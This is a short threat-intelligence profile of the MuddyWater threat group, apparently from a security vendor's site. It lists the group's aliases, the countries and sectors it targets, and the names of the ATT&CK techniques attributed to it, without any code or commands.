Adversary | Muddywater

Updated: Jul 21, 2021

Also Known As

TEMP.Zagros | Static Kitten | Seedworm | Mercury | Cobalt Ulster



Target Countries

Austria | Afghanistan | Azerbaijan | Bahrain | Georgia | Iraq | Jordan | Malta | Pakistan | Russia | Saudi Arabia | Tajikistan | Turkey | Turkmenistan | United Arab Emirates | United States

Targeted Verticals


Critical Infrastructure

Financial Services

Government | Military



Abuse Elevation Control Mechanism: Bypass User Account Control

Application Layer Protocol: Web Protocols

Archive Collected Data: Archive via Utility

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Command and Scripting Interpreter: Windows Command Shell

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: Visual Basic

Credentials from Password Stores

Credentials from Web Browsers

Data Encoding: Standard Encoding

Deobfuscate/Decode Files or Information

Exfiltration Over C2 Channel

Exploitation for Client Execution

File and Directory Discovery

Ingress Tool Transfer

Inter-Process Communication: Dynamic Data Exchange

Inter-Process Communication: Component Object Model

Masquerading: Match Legitimate Name or Location

Multi-Stage Channels

Obfuscated Files or Information

Compile After Delivery


Office Application Startup: Office Template Macros

OS Credential Dumping: LSASS Memory

OS Credential Dumping: LSA Secrets

OS Credential Dumping: Cached Domain Credentials

Phishing: Spearphishing Attachment

Process Discovery

Proxy: External Proxy

Scheduled Task/Job: Scheduled Task

Screen Capture

Signed Binary Proxy Execution: Rundll32

Signed Binary Proxy Execution: CMSTP

Signed Binary Proxy Execution: Mshta

Software Discovery: Security Software Discovery

System Information Discovery

System Network Configuration Discovery

System Owner/User Discovery

Unsecured Credentials: Credentials In Files

User Execution: Malicious File

Windows Management Instrumentation


Related Posts

See All